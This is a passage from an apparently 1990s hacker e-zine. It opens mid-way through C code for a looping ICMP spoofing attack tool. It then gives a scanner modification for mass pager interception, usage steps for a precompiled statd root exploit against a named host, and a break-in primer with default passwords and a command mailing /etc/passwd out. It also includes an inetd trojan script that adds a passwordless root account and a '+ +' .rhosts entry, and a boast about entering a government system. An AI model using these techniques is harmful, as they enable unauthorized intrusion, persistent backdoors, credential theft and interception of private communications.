  879. icmp->type = 3;
  880. icmp->code = atoi(argv[6]);
  881.  
  882. ipfake->saddr = ip->daddr;
  883. ipfake->daddr = ip->saddr;
  884.  
  885. ipfake->version  = 4;
  886. ipfake->ihl      = 5;
  887. ipfake->ttl      = 255;
  888. ipfake->protocol = IPPROTO_TCP;
  889. ipfake->tot_len  = htons(IPHDRSIZE+36);
  890. ipfake->tos      = 0;
  891. ipfake->id       = 22;
  892. ipfake->frag_off = 0;
  893. ipfake->check    = in_cksum(ipfake,IPHDRSIZE);
  894.  
  895. for(;;){
  896.  
  897.  *((unsigned int *)data)          = htons(s_port);
  898.  *((unsigned int *)(data+2))      = htons(t_port);
  899.  *((unsigned long *)(data+4))     = 6580;
  900.  icmp->checksum=0;
  901.  icmp->checksum = in_cksum(icmp,36);
  902.  
  903.  sin_dst.sin_addr.s_addr = ip->daddr;
  904.  sin_dst.sin_family = AF_INET;                     
  905.                          
  906.  sendto(s,packet,IPHDRSIZE+36,0,
  907.  (struct sockaddr *)&sin_dst,sizeof(struct sockaddr)); 
  908.  
  909. printf("sport,tport:%i,%i\n\n",s_port,t_port);
  910.  
  911. s_port=s_port+s_portinc;
  912. t_port=t_port+t_portinc;
  913.  
  914. usleep(200);
  915. }
  916. }                                           
  917. }
  918.  
  919. ───────────────────────────────────────────────────────────────────────────────
  920. ===============================================================================
  921. ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
  922. ===============================================================================
  923. ───────────────────────────────────────────────────────────────────────────────
  924.   1. Realistic Pro-50 scanner discriminator mod : xFli
  925. ───────────────────────────────────────────────────────────────────────────────
  926.  
  927. The Realistic pro-50 is a very cheap scanner available from tandy, which is
  928. ideal for, amongst other things, pager interception. If you have a machine
  929. with windows 95 and a soundcard, using one of these scanners you can
  930. intercept POCSAG signalling for the entire country. 
  931.  
  932. there is poc32 software for win95 that allows decoding without any extra
  933. hardware (Such as the l0pht's hardware decoder). So check out www.l0pht.com
  934. or do a websearch for it..
  935.  
  936. Before you can get optimum decode rates, you need to modify the scanner so
  937. you can tap the baseband audio, before the pure signal has been mashed up by
  938. amplification. This is very simple and should be easy for anyone with a
  939. little soldering iron experience. 
  940.  
  941. You will need a soldering iron, solder, a philips (star) head screwdriver,
  942. a few bits of insulated hookup wire and a mono 3.5mm jack socket.
  943.  
  944. First, remove the back half of the scanner's case by undoing the four large
  945. screws at the sides. Now you should see a pcb with a couple of 16 pin IC's
  946. and some other bits and pieces.
  947.  
  948. Look at the codes printed on the IC's. The one we want will be labelled
  949. something along the lines of 'KA-3661N'. Its the chip nearest the top of the
  950. scanner. Notice there is a pin sticking up from the pcb next to pin 9 of the
  951. chip. This is connected to the discriminator pin of the chip (Thanks tandy!)
  952.  
  953. Solder 1 length of wire to this pin, be quick to avoid damaging the IC. Next,
  954. look at where the coax (antenna) socket comes into the case. There will be a
  955. small metal tag coming off it which is attached to the nut holding the
  956. connecter onto the case. This is the ground or GND connection. Solder another
  957. length of wire to this. Now, solder these two wires onto your 3.5mm socket,
  958. and find a nice place to mount it in the case (we want this to look good :)
  959. Use a lighter to heat up a nail or similar and make a hole in the case for
  960. the socket. Wrap it in insulating tape to avoid any shorts, then glue it in
  961. and put the case back together.
  962.  
  963. Plug the scanner into your soundcards microphone socket, using preferably
  964. a _shielded_ audio cable. Start up poc32 and tune the scanner to 153.225
  965. (BT Easyreach paging). Set poc32's baud rate to 1200 and service type to
  966. 'auto'. Go to the properties menu, click the hardware&co tab, and select
  967. the soundcard as the device to use. Click ok and hopefully you should see
  968. messages on the screen! If you dont, open up the scanner and check all              
  969. the connections, also check the recording volume in your soundcard setup. 
  970.  
  971. POCSAG encoded messages are transmitted in batches, expect a _lot_ of traffic
  972. on the bt frequencies. Another nice thing is that any pager message is
  973. transmitted to the _entire_ country, so if you are in glasgow you can pick
  974. up pages intended for someone in london.
  975.  
  976. Remember also that a lot of pages aren't just of the 'Ill be back at 5 cook
  977. the dinner hoe' variety. There are a lot of automated systems out there,
  978. including ISP's, ATM (Cash machine) minders, and even remote freezer
  979. monitors.
  980.  
  981. Oh, and make sure you remember that I'm not responsible if you ruin your
  982. scanner with shoddy soldering :)
  983.  
  984. ───────────────────────────────────────────────────────────────────────────────
  985. ===============================================================================
  986. ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
  987. ===============================================================================
  988. ───────────────────────────────────────────────────────────────────────────────
  989.   1. rpc-stat.pgp
  990. ───────────────────────────────────────────────────────────────────────────────
  991.  
  992. Included in this issue of Confidence Remains High is a file called rpc-stat.pgp
  993. it is infact the PRECOMPILED version of the original statd exploit, it will
  994. remotely root any SunOS 5.4 system running statd, the statdscan.c in section B
  995. *WILL* scan for this vulnerability and not the 551 x86 version, so, this is
  996. how you use it..
  997.  
  998.   1: use pgp to decrypt it, the passphrase is pop3, you don't need a key.
  999.                                               ^^^^
  1000.   2: upload the binary to a SUNOS system, it will run from basically any
  1001.      SunOS system (4.1.3, 5.4, 5.5.1 etc.), I have tried it from many..
  1002.  
  1003.   3: run the binary like this...
  1004.  
  1005.   % rpc-stat www.fmb.com
  1006.   rpc.statd located on port 31227
  1007.   sent exploit code, waiting for shell...
  1008.   # whoami
  1009.   root
  1010.   # who
  1011.   #
  1012.   # uname -a
  1013.   Sun Microsystems SunOS 5.4 generic blah blah blah...
  1014.   # 
  1015.  
  1016. ....You now have root on www.fmb.com, it's really as simple as that!
  1017.  
  1018. You can try to disassemble the binary, and then reassemble it so it will
  1019. run from Linux systems, thats possible.
  1020.  
  1021. Have fun kids! I've had a great time with it!
  1022.  
  1023. so1o
  1024.  
  1025. ───────────────────────────────────────────────────────────────────────────────
  1026.   2. If you're really dumb : so1o
  1027. ───────────────────────────────────────────────────────────────────────────────
  1028.  
  1029. An Introduction to Unix, flavours, users and files.
  1030. ===================================================
  1031.  
  1032. Unix is a multi-user, multi-tasking operating system, as used by Schools and
  1033. Universities for development, research, a whole multitude of tasks, Unix is
  1034. also used by companies in manufacturing, databases, you name it, Unix is used
  1035. for it, most www servers also run Unix.
  1036.  
  1037. If a Unix system is connected to a network, or the internet, then users can
  1038. remotely log into the system, if they have the correct login and password,
  1039. Unix systems can support up to hundreds of users all running programs and
  1040. doing different things on that system, because it's also capable of multi-
  1041. tasking, so users log into Unix systems, either from a terminal locally (ie.
  1042. in the same building, or room), or remotely (ie. across the internet, or a
  1043. LAN - Local Area Network), provided the have a valid login and password.
  1044.  
  1045.  
  1046. Connecting to a remote Unix system :
  1047. ====================================
  1048.  
  1049. To connect to a remote Unix system, we use a program called TELNET, this is
  1050. found by default on all Unix systems, and is also shipped with some Windows
  1051. systems, if you don't have telnet.exe, or a Unix account / system, the I
  1052. suggest you go to www.tucows.com and search for a telnet client.
  1053.  
  1054. From a Unix system, we would connect to abc.123.com using..
  1055.  
  1056. $ telnet abc.123.com
  1057.  
  1058. From a Windows system, we would run telnet.exe and the go file ▌ remote system
  1059. and type abc.123.com and click on "OK", it should then connect after a few
  1060. seconds..
  1061.  
  1062. Identifying the Unix version :
  1063. ==============================
  1064.  
  1065. The first thing we must do to try and work out how we should break into the
  1066. system is identify the version of Unix it is running.
  1067.  
  1068. There are many different types of the Unix operating system, called flavours,
  1069. the most common Unix flavours are..
  1070.  
  1071.  Linux, SunOS (Solaris), IRIX, FreeBSD, BSDi, Ultrix, Digital Unix, AIX..
  1072.  
  1073. You can usually identify the type of Operating System by connecting to the
  1074. remote system, so we would use a program called telnet, which allows us to
  1075. connect to remote systems across the internet, from a Unix system we would
  1076. type...
  1077.  
  1078. % telnet voycrs.gsfc.nasa.gov
  1079.  
  1080. and from windows we would run telnet.exe, then go File ▌ Remote system, and
  1081. type in "voycrs.gsfc.nasa.gov", and then connect to that system, when it
  1082. connects, you will see something like this..
  1083.  
  1084.  Unix System V Release 4.0 (voycrs)
  1085.  
  1086.  login:
  1087.  
  1088. That's a standard login prompt, and we are told that the system is running
  1089. Unix System V Release 4.0, which is the equivalent of a SunOS system, so
  1090. we know that system is running SunOS.
  1091.  
  1092. If the system says Linux 2.0.29, then it is running Linux, if the system says
  1093. IRIX, then it is running IRIX, it's pretty simple..
  1094.  
  1095. Users on a Unix system :
  1096. ========================
  1097.  
  1098. The user list is in the /etc/passwd file on a Unix system, each user has a
  1099. login assigned to them, here are the super-user accounts logins..
  1100.  
  1101. root                   - the root user can fully control the system, remove any
  1102.                          files, and even shut the system down.
  1103. bin                    - the bin user owns most of the programs on the system
  1104. adm                    - the adm user is a standard admin account
  1105. admin                  - same as above
  1106. uucp                   - this is the unix-to-unix copy account
  1107. lp                     - this is the lineprinter account
  1108. postmaster             - this is the mail admin account
  1109.  
  1110. as well as some default accounts..
  1111.  
  1112. test                   - used by admins to test certain system programs
  1113. 4Dgifts                - a default login for IRIX systems
  1114. guest                  - widely used login for new users
  1115.  
  1116. the passwords for those logins are usually along the lines of..
  1117.  
  1118. <none>    admin
  1119. test      tutor
  1120. qwerty    adm1n
  1121. letmein   asdfgh
  1122. test1     zxcvbn
  1123. test12    secret
  1124. abc123    password
  1125.  
  1126. If you want to find out if a certain user exists on a Unix system, you can
  1127. use finger...
  1128.  
  1129.   finger user@host.here.com
  1130.  
  1131. that command will tell you if the user exists, you can get a finger client for
  1132. windows from www.tucows.com, or use finger from a Unix system, it will be
  1133. already installed.
  1134.  
  1135. The Unix filesystem :
  1136. =====================
  1137.  
  1138. The file system in Unix is diveded up into 3 catagories :
  1139.  
  1140.         Directories
  1141.         Ordinary files
  1142.         Special files
  1143.           
  1144. Basic stucture :        
  1145. ----------------
  1146.  
  1147. (/) - this is abreviation for the root dirctory.
  1148.  
  1149.     root level                      root
  1150.                                     (/)                                 system
  1151. -------------------------------------|----------------------------------level
  1152. |      |        |         |                  |        |       |        |
  1153. /unix   /etc    /dev      /tmp               /lib     /usr    /usr2    /bin
  1154.         |                                        _____|_____
  1155. login passwd                                     |    |    |
  1156. level                                            /john  /cathy    
  1157.                              ________________________|_______________
  1158.                             |        |     |      |        |        |
  1159.                         .profile   /mail  /pers  /games   /bin     /michelle
  1160. *.profile - in case                        |    __|______  |      __|_______
  1161. you wich to change your enviroment     capital |        | data   |         |
  1162. but after you log off. It sets to             othello  starwars letter letter1
  1163. default.                                     
  1164.  
  1165. the /unix - is the kernal (in older systems)
  1166.  
  1167. /etc      - contains system administrators files,Most are not available to the
  1168.             regular user.(this directory contains the /passwd file)
  1169.  
  1170.     Here are some files under /etc directory:
  1171.  
  1172.     /etc/passwd
  1173.     /etc/utmp
  1174.     /etc/adm/sulog
  1175.     /etc/motd
  1176.     /etc/group
  1177.     /etc/conf
  1178.     /etc/profile
  1179.   
  1180. /dev - contains files for physical devices such as printer and the disk drives
  1181. /tmp - temporary file directory
  1182. /lib - dirctory that contains programs for high level languages
  1183. /usr - this directory contains dirctories for each user on the system
  1184.  
  1185.     Eg. of a list of files under /usr
  1186.  
  1187.     /usr/tmp
  1188.     /usr/lib
  1189.     /usr/docs
  1190.     /usr/news
  1191.     /usr/spool 
  1192.     /usr/spool/lp
  1193.     /usr/lib/uucp
  1194.  
  1195. /bin - contain executable programs (commands)
  1196.  
  1197.     Eg. of a list of programs in /bin
  1198.  
  1199.     /bin/passwd
  1200.     /bin/chmod
  1201.     /bin/uptime
  1202.     /bin/whoami
  1203.     /bin/uname
  1204.     /bin/finger
  1205.  
  1206. The root also contains:                                                       
  1207.  
  1208. /bck        - used to mount a back up file system.
  1209. /install    - Used to install and remove utilities
  1210. /lost+found - This is where all the removed files go, This dir is used by fsck
  1211.               (1M)
  1212. /save       - A utility used to save data
  1213. /mnt        - Used for temporary mounting (also /mount)
  1214.  
  1215. hidden files :
  1216. --------------
  1217.  
  1218. files like .rhosts and .profile are hidden from ls listings, because of the .
  1219. the . infront of a file makes it hidden, it is a useful way to hide programs,
  1220. by calling them .setup and .listing for example.
  1221.  
  1222. Local Unix commands (Explained in GREAT detail)
  1223. ===============================================
  1224.  
  1225. These commands are to be run from the shell command prompt, ie. if you are
  1226. actually on a Unix system using telnet, the $ and # are command prompts..
  1227.  
  1228. At the Unix prompt type the pwd command, it will show you the current working
  1229. directory you are in.
  1230.  
  1231. # pwd
  1232. /root                   - if you have hit gold and hacked the root account!
  1233. #                       - the # prompt also means you are a super-user
  1234.  
  1235. This gives you the full login directory for the user
  1236.  
  1237. or..
  1238.  
  1239. $ pwd
  1240. /home/john
  1241. $
  1242.  
  1243. Assuming you have hacked into johns account on the system.
  1244.  
  1245. Now lets say you wanted to move down to the michelle directory (you own this)
  1246. that contains letters that you wanted to read. You would type in
  1247.  
  1248. $ cd michelle or cd /home/john/michelle
  1249. $ pwd
  1250. /home/john/michelle
  1251. $
  1252.  
  1253. Going back one directory up type in:
  1254.  
  1255. $ cd ..
  1256.  
  1257. or going to your parent directory (your home) just type in "cd" or "cd ~"
  1258.       
  1259. Listing file directories assuming you are in the parent directory:
  1260.  
  1261. $ pwd
  1262. /home/john
  1263. $ ls
  1264. mail
  1265. pers
  1266. games        
  1267. bin
  1268. michelle
  1269.  
  1270. ..This won't list hidden files, to list ALL files, type..
  1271.  
  1272. $ cd
  1273. $ ls -a
  1274. :
  1275. :
  1276. .profile
  1277.  
  1278. To list file names in michelle's directory type..
  1279.  
  1280. $ ls michelle (that if your in the johns home directory)
  1281. $ ls /home/john/michelle (from anywhere on the system)
  1282.  
  1283. ls -l            
  1284. -----             
  1285.  
  1286. The ls -l is an an important command in unix.This command displays the whole
  1287. directory in long format, if try to run this in parent directory..
  1288.  
  1289. $ ls -l
  1290. total 60
  1291. -rwxr-x---    5 john      bluebox    10 april 9  7:04  mail
  1292. drwx------    7 john      bluebox    30 april 2  4:09  pers
  1293.      :            :         :         :     :      :    :
  1294.      :            :         :         :     :      :    :
  1295. -rwxr-x---     6 cathy    bluebox    13 april 1  13:00 partys
  1296.      :            :         :         :     :      :    :
  1297. $
  1298.    
  1299. The total 60 tells one the amount of disk space used in a directory.
  1300.  
  1301.  
  1302. File permissions :
  1303. ==================
  1304.  
  1305. The -rwxr-x--- is read in triples of 3.. this tells the user what the file
  1306. permissions are.
  1307.  
  1308. The first chracter eg (-, d, b, c) - means as follows :
  1309.  
  1310.         - is an ordinary file
  1311.         d is a directory
  1312.         b is block file
  1313.         c is a chracter file
  1314.  
  1315. And...
  1316.  
  1317.         r stands for read permission
  1318.         w is write permission
  1319.         x is execute
  1320.  
  1321. The first colum is read in 3 triples as stated above. The first group of 3
  1322. (in -rwxr-x---) after the "-" specifies the permission for the owner of
  1323. the file,the second triple are for the groups (the fourth colum) and the
  1324. last triple are the permissions for all other users.
  1325.  
  1326. Therefore the -rwxr-x--- is read as follows..
  1327.  
  1328. The owner john has permission to read, write and execute anything in the bin
  1329. directory but the group has no write permission to it and the rest of the
  1330. users have no permission at all. The format of one of the lines in the above
  1331. output is as follows:
  1332.  
  1333. file type-permissions, links, owner, owners group, bytes taken, date, time when
  1334. last renued, directory or file name.
  1335.  
  1336. You will be able to read andexecute cathys file named party due her being in
  1337. the same user group as you.
  1338.  
  1339. chmod                    
  1340. -----             
  1341. The chmod command changes permission of a directory or a file.Format is
  1342. chmod who+,-,=r,w,x
  1343. The who is substituted by u-user,g-group,o-other users,a-all.
  1344. The + means add permission,- means remove permission,= - assign.  
  1345. Example :If you wanted all other users to read the file name mail ,type:   
  1346.  
  1347. $ chmod o+r mail
  1348.  
  1349. cat         
  1350. ---          
  1351.  
  1352. Now suppose you wanted to read the file letter. You could type..
  1353.  
  1354. $ cat letter
  1355. line one ...\
  1356. line two ... }- the output of letter
  1357. line three../
  1358. $
  1359.  
  1360. or..
  1361.  
  1362. If you are in any other directory type in :
  1363.  
  1364. $ cat /home/john/michelle/letter
  1365.  
  1366. and you will have the same output.
  1367.  
  1368. Some cat options are  -s,-u,-v,-e,-t
  1369.  
  1370. Special Chracters in Unix:
  1371. -------------------------
  1372. *     - matches any number of single characters eg. $ ls john* will list
  1373.         all files that begin with john
  1374. [...] - matchs any one of the chracter in the [ ]
  1375. ?     - matches any single chracter
  1376. &     - runs a process in the backgroung leaving your terminal free
  1377. $     - values used for variables also $n - null argument
  1378. >     - redirectes output ls -la > /tmp/list
  1379. <     - redirects input to come from a file
  1380. >>    - redirects command to be added (appended) to the end of a file
  1381. |     - pipe output (eg: cat /etc/passwd ▌ mail tk85@hotmail.com will mail
  1382.                      tk85@hotmail.com the /etc/passwd file)
  1383. "..." - Turn of meaning of special chracters excluding $,`
  1384. `...` - allows command output in to be used in a command line
  1385. '...' - turns of special meaning of all chracters
  1386.  
  1387. Common local commands :
  1388. =======================
  1389.  
  1390. passwd
  1391. ------
  1392.  
  1393. Password changing seems to be a big thing among the savants. Anyway to change
  1394. the password one would use the 'passwd' command as shown below:
  1395.  
  1396.    $ passwd
  1397.    Changing password for john
  1398.    Old password:                              
  1399.    New password:                              
  1400.    Retype new password:
  1401.    $
  1402.   
  1403. ps
  1404. --
  1405.  
  1406. It's sometimes necessary to see what command procesess you are running, this
  1407. command lets you see that.
  1408.  
  1409. ps [-a all processes except group leaders] [-e all processes] [-f the whole
  1410.    list]                                                           
  1411.  
  1412.    $ ps
  1413.  
  1414.    PID   TTY  TIME   COMMAND
  1415.    -------------------------
  1416.    200   tty9 14:20  ps
  1417.  
  1418.    The systems reports (PID - process idenetification number which is a #
  1419.    from 1-30,000 assigned to UNIX processes)
  1420.    It also reports the TTY, TIME and the COMMAND being executed at the time.
  1421.    To stop a process enter :    
  1422.  
  1423.    $ kill -9 [PID] (this case its 200)
  1424.    $
  1425.  
  1426. grep
  1427. ----
  1428.  
  1429. This comand is important when seaching for a word or words in large files.
  1430.  
  1431. grep [argument] [file name] - searchs for an file that contains the argument
  1432.                               for example:
  1433.    $ grep phone cathy
  1434.     phone   michelle  (718)5551234
  1435.     phone   cindy   (718)5553456
  1436.  
  1437.     What this did was to find the argument 'phone' in the file cathy.If the
  1438.     argument consists of two or more words then  it must be enclosed in single
  1439.     quotes.
  1440.  
  1441.  
  1442. mv
  1443. --
  1444.  
  1445. mv [file names(s)] [ dir name ] - renames a file or moves it to another
  1446.                                   directory eg.      
  1447.    $ mv letter letters 
  1448.    $
  1449.  
  1450.         This renames the file letter to letters thereby deleting letter
  1451.         or if you want to move files then..
  1452.  
  1453.    $ mv /home/john/pers/capital /home/john/michelle/capital
  1454.    $   
  1455.  
  1456.         This moves the file capital to the directory named michelle
  1457.  
  1458. diff
  1459. ----
  1460.  
  1461. diff [file name] [ file name] - show diffrence between two files. Output of
  1462.                                 this will have something like 4, 5c4, 5 then
  1463.                                 it will display both sets of files on the
  1464.                                 screen The 4, 5c4, 5 means that you must
  1465.                                 change "c" lines 4 to 5 in one file to
  1466.                                 line 4 to 5 in another.
  1467.  
  1468.       Options for using this command are :
  1469.  
  1470.        -b             - it ignores blank spaces
  1471.        -h             - compares it quickly
  1472.        -s             - reports files that are the same
  1473.        -S [file]      - this is when you want to compare a directory starting at
  1474.                         a specific file
  1475.        
  1476.  
  1477.        There is also a command to compare 3 files which is :   
  1478.  
  1479.        diff3 [options] [file1] [file2] [file3]
  1480.  
  1481. cp
  1482. --
  1483.  
  1484. cp [file name] [file name] - makes a copy of a file
  1485.  
  1486.    $ cp letter letters
  1487.    $
  1488.  
  1489.         The file letters is a dupilcate copy of letter. In this case the
  1490.         original is not erased like in the mv command
  1491.  
  1492.  
  1493.  
  1494. more Unix commands:
  1495. -------------------
  1496.  
  1497. man [command] or [c/r] -will give you a list of commands explainations
  1498.  
  1499. help - available on some UNIX systems
  1500.                   
  1501. mkdir [dir name(s)] - makes a directory      
  1502.  
  1503. rmdir [dir name(s)] - removes directory.You wont be able to remove the
  1504.                       directory if it contains files in them
  1505.  
  1506. rm [file name(s)]   - removes files. rm * will erase all files in the current
  1507.                       dir. Be carefull!!. Some options are :
  1508.  
  1509.                       [-f unconditional removal] [-i Prompts user for y or n]
  1510.                         
  1511. write [login name]  - to write to other users terminals, sort of a chat.
  1512.  
  1513. mesg [-n] [-y]      - doesn't allow others to send you messages using the
  1514.                       write command. Wall used by system admin overrides it.
  1515.  
  1516. $ [file name]    - to execute any file that you have permission to run
  1517.  
  1518. wc [file name]   - Counts words,chracters, lines in a file
  1519.  
  1520. stty [modes]     - Set terminal I/O for the current devices
  1521.  
  1522. sort [filename]  - Sorts and merges files many options
  1523.  
  1524. spell [file name] > [file name] - The second file is where the misspelt words
  1525.                                   are entered
  1526.  
  1527. date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options
  1528.  
  1529. at [-r] [-l] [job] - Does a specified job at a specified time.The -r Removes 
  1530.                      all previously scheduled jobs.The -l reports the job #
  1531.                      and status of all jobs scheduled
  1532.  
  1533. write [login] [tty] - Sends message to the login name.Chat!
  1534.  
  1535.  
  1536. su [login name]
  1537. ---------------
  1538.  
  1539. The su command allows one to switch user to a super user to a user.
  1540. Very important could be used to switch to super user accounts.
  1541.  
  1542. Usage :
  1543.  
  1544. $ su root
  1545. password:
  1546. #
  1547.  
  1548. This su command will be monitored in /usr/adm/sulog and this file of all files
  1549. is carefully monitered by the system administrator. Suppose you hacked in johns
  1550. account and then switched to the root account (ABOVE) your /usr/adm/sulog
  1551. entry would look like:
  1552.  
  1553. SU  04/19/88  21:00 + tty 12 john-root
  1554.  
  1555. Therfore the system administrator would know that john swithed to the root
  1556. account on 4/19/88 at 21:00 hours
  1557.  
  1558. Searching for valid login names:   
  1559. --------------------------------
  1560.  
  1561. using who..
  1562.  
  1563. $ who  ( command informs the user of other users on the system)
  1564. cathy  tty1  april 19  2:30
  1565. john   tty2  april 19  2:19
  1566. dipal  tty3  april 19  2:31
  1567. :
  1568. :
  1569. tty is the users terminal,date,time each logged on.dipal,john are valid
  1570. logins.   
  1571.  
  1572. Files worth looking at (cat)..
  1573.  
  1574. /etc/passwd file:
  1575. -----------------                     
  1576.  
  1577. The /etc/passwd is a vital file to cat. For it contains login names of all
  1578. users including super user accounts and their passwords. In the newer
  1579. Unix releases they are tighting their security by moving the encrypted
  1580. passwords from /etc/passwd to /etc/shadow making it only readable by root.
  1581. This is optional ofcourse.
  1582.  
  1583. $ cat /etc/passwd
  1584. root:D943/sys34:0:1:0000:/root:/bin/sh
  1585. sysadm:k54doPerate:0:0:administration:/usr/admin:/bin/sh
  1586. checkfsys:*:0:0:check file system:/usr/admin:/bin/sh
  1587. :
  1588. other super user accs.
  1589. :
  1590. john:chips11:34:3:john scezerend:/home/john:/bin/bash
  1591. :
  1592. other users..
  1593. :
  1594. $
  1595.  
  1596. If you have reached this far capture this file as soon as posible.
  1597. This is a typical output /etc/passwd file. The entries are seperated
  1598. by a ":", they are made be up to 7 fields in each line.
  1599.  
  1600. sysadm account, for example..
  1601.  
  1602.   sysadm:k54doPeHte:0:0:administration:/usr/admin:/bin/sh
  1603.     ^         ^      ^ ^       ^            ^         ^
  1604.     1         2      3 4       5            6         7
  1605.  
  1606. This is what each field represents..
  1607.  
  1608.    1: the login name, sysadm
  1609.    2: the ENCRYPTED password
  1610.    3: the user id, 0, the same as root
  1611.    4: the group id, 0, the same as root
  1612.    5: the users real name
  1613.    6: the users home directory, /usr/admin
  1614.    7: the shell that the user uses when he connects
  1615.  
  1616. ..but in the case of the checkfsys account :
  1617.  
  1618.   checkfsys:*:0:0:check file system:/usr/admin:/bin/sh
  1619.  
  1620.   the :*: in place of the encrypted password means that this account is locked
  1621.   this IS NOT password shadowing, this is a lock on the account, so no-one can
  1622.   login as checkfsys without root taking the lock off the account's password.
  1623.   
  1624.  
  1625. IF PASSWORD SHADOWING IS ACTIVE :
  1626. ---------------------------------
  1627.  
  1628. If the shawdowing is active the /etc/passwd would look like this:
  1629.  
  1630. root:x:0:1:0000:/:/bin/sh
  1631. sysadm:x:0:0:administration:/usr/admin:/bin/sh
  1632.  
  1633. The password fieled is substituted by "x".
  1634.  
  1635. The /etc/shawdow file is only readable by root will look similar to this:
  1636.                          ^^^^^^^^^^^^^^^^^^^^^
  1637. root:D943/sys34:5288:::::::
  1638. :
  1639. super user accounts
  1640. :
  1641. Cathy:m4faDai1:5055:7:120::::
  1642. :
  1643. all other users
  1644. :  
  1645.  
  1646. The first field contains users login, the second contains the password
  1647. (STILL ENCRYPTED), the third contains a code of when the password was last
  1648. changed, the fourth and the fifth contains the minimum and the maximum
  1649. numbers of days for pw changes (It's rare that you will find this in the
  1650. super-user logins due to there hard to guess passwords)
  1651.  
  1652. /etc/group
  1653. -----------
  1654. The file has each group on the system. Each line will have 4 entries
  1655. separated by a ":"  Example of concatenated /etc/group:
  1656.  
  1657. root::0:root
  1658. adm::2:adm,root
  1659. bluebox::70:
  1660.  
  1661. Group name:password:group id:login names in the group
  1662.  
  1663.   ** It very unlikely that groups will have passwords assigned to them **
  1664.  
  1665. The id "0" is assigned to the root user.
  1666.  
  1667. Adding new users when you're root
  1668. ---------------------------------
  1669.  
  1670.         *** You must usually be root to run these commands ***
  1671.  
  1672. # adduser                 - will take you through a routine to add a user
  1673.                             this will look a little like this..
  1674.  
  1675. Anytime you want to quit, type "q".
  1676. If you are not sure how to answer any prompt, type "?" for help
  1677.  
  1678. If a default appears in the question,press <RETURN> for the default.
  1679.  
  1680. Enter users full name [?,q]:                      (enter the name you want)                
  1681. Enter users login ID [?,q]:                        (the id you want to use)
  1682. Enter users ID number (default 50000) [?,q) [?,q]:            (press enter)
  1683. Enter group ID number or group name:             (any name from /etc/group)
  1684. Enter users login home directory:                        (enter /home/name)
  1685.  
  1686. This is the information for the new login:
  1687. Users name:                                                          (name)
  1688. login ID:                                                              (id)
  1689. users ID:50000
  1690. group ID or name:     
  1691. home directory:/home/name
  1692.  
  1693. Do you want to install,edit,skip [i,e,s,q]? (enter your choice if "i" then)
  1694. Login installed
  1695. Do you want to give the user a password?[y,n]     (its better to enter one)
  1696. New password:
  1697. Re-enter password:   
  1698.  
  1699. ..That information will then be added to the /etc/passwd file, and the
  1700.   home dir and all the default files made for the user.
  1701.  
  1702. ───────────────────────────────────────────────────────────────────────────────
  1703.   3. inetd backdoors : Phreak-0
  1704. ───────────────────────────────────────────────────────────────────────────────
  1705.  
  1706. I think I have found a new backdoor that could be considered pretty
  1707. undetectable.  I found this while I was playing around with things in the
  1708. /etc/inetd.conf file.  What it does is allow you to remotely issue any
  1709. command of your choice as root by just telneting to a port that YOU
  1710. specify. You have to have already have compromised root for this to work
  1711. =)   
  1712.  
  1713. A normal entry into the inetd.conf will look like this :
  1714.  
  1715. pop3   stream  tcp     nowait  root    /usr/sbin/tcpd  in.pop3d
  1716.  
  1717. Notice that tcpd is what executes when the in.pop3d service is called upon.
  1718. tcpd is a program that verifies that you have access to use the specified
  1719. service. After you are verified, it will then execute "in.pop3d", which is
  1720. specified.
  1721.  
  1722. What if we made a shell script named in.pop3d and had it issue a set of
  1723. commands whenever used, and then start up the real service?
  1724.  
  1725. So here is how you setup the backdoor, step by step :
  1726.  
  1727. 1) First and foremost, type csh so you arent logged =)
  1728.  
  1729. 2) After gaining root, find the service you want to manually trojan in
  1730.    /etc/inetd.conf.  The service SHOULD already be UNCOMMENTED if you want
  1731.    to be extremely undetectable (The admin would check for new services as
  1732.    backdoors, not old ones already in use). This service should be defined as
  1733.    running as root.
  1734.  
  1735. 3) Take the service, such as in.pop3d and rename it to one of the programs
  1736.    that are COMMENTED with #, as those services are not in use. 
  1737.  
  1738.    eg.  mv /usr/sbin/in.pop3d /usr/sbin/in.talkd
  1739.  
  1740. 4) Now, you have to create a new in.pop3d so that people are able to use it 
  1741.    type : pico in.pop3d  then stick this simple shell script in there :
  1742.  
  1743. #!/bin/sh
  1744. #Service Trojan by Phreak-0
  1745. echo "bewm::0:0:,,,:/:/bin/csh" >> /etc/passwd
  1746. #..or any command you may desire.
  1747. #echo "+ +" > /root/.rhosts
  1748. #echo "0wned Bitches" > /etc/motd
  1749. #
  1750. #Warning above could get annoying =)
  1751. #
  1752. #After our trojan has executed, we spawn the real program
  1753. #service, which in this case you renamed to in.talkd.
  1754.  
  1755. /usr/sbin/in.talkd
  1756.  
  1757. #this really spawns the old /usr/sbin/in.pop3d
  1758.  
  1759. Now save the file as the daemon you picked in step 2 and type :
  1760. chmod +x filename
  1761.  
  1762. filename is the name of the daemon shell script for all you dumbasses
  1763.  
  1764. 5) Now you have to restart inetd for the changes to take place.
  1765.    kill inetd by typing:
  1766.  
  1767.    ps -x |grep inetd
  1768.    1529  ?  S    0:00 inetd 
  1769.  
  1770.    Get the pid of inetd (1529) and type:
  1771.  
  1772.    kill -HUP 1529
  1773.  
  1774.  
  1775. 6) Now get off and just telnet to port 110 of the victim and just disconnect.
  1776.    Then telnet over and try to login as the name you specified in the password
  1777.    file (bewm).  You are now root.
  1778.  
  1779.    Now, whenever anyone telnets to port 110 of victim.com, any command you
  1780.    specified in the shell script will be executed.  muahah they will never
  1781.    suspect that by just telneting to a port of your choice on the remote
  1782.    machine, you can execute any command as root that you specify. Remember to
  1783.    be creative with the script.  this backdoor is sure to last for a while, so
  1784.    peace out yo..
  1785.  
  1786.    -- Phreak-0 of #CaRpartS NTF
  1787.  
  1788. ───────────────────────────────────────────────────────────────────────────────
  1789.   4. 0wned : so1o
  1790. ───────────────────────────────────────────────────────────────────────────────
  1791.  
  1792. ..this motd r00lz :
  1793. -------------------
  1794.  
  1795. System V.3.1 / UTS 2.1 (uts)
  1796.  
  1797. login: informix
  1798. Password:
  1799. ***************************************************************************
  1800. *     THIS  SYSTEM IS TO  BE USED  EXCLUSIVELY  FOR OFFICIAL GOVERNMENT   *
  1801. *     BUSINESS.  USERS  VIOLATING THIS RESTRICTION  WILL BE  SUBJECT TO   *
  1802. *     ADMINISTRATIVE AND CRIMINAL PENALTIES.                              *
  1803. ***************************************************************************
